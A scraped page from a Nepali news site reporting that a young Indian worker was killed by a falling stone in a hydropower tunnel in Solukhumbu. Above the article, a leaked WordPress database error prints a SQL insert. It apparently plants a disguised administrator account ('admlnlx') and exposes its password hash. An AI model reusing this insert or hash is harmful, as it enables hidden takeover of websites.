WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNyMS2WVeN8P.zhZlap.vi0ERzSOJM.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 17:08:33', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, सोलुखुम्बु । सोलुखुम्बुमा निर्माणाधिन तल्लो सोलुहाईड्रो पावर कम्पनीमा एक भारतिय कामदारको मृत्यु भएको छ । टनेलमा सिमेन्ट प्लास्टर गर्नेक्रममा माथिबाट आएको ढुंगाले लागेर २० बर्षका रबिआल अलिको मृत्यु भएको सोलुखुम्बु जिल्ला प्रहरीले जनाएको छ ।
जिल्ला अस्पताल फाप्लुमा उपचारको क्रममा अलिको मंगलबार बिहान ६ बजे मृत्यु भएको सोलुखुम्बु जिल्ला प्रहरीले जनाएको छ ।
जिल्ला प्रहरी सोलुखुम्बुका अनुसार सोलुदुधकुण्ड नगरपालिका ११ तिङ्लामा निर्माणाधिन हाईड्रोमा करिब सात महिना अघि काम गर्न आएका अलिका तीन दाजुभाई संगै काम गरिरहेका थिए । शबको मंगलबारनै जिल्ला अस्पताल फाप्लुमा पोष्टमाटम गरि गाडीबाट भारत लगिएको छ ।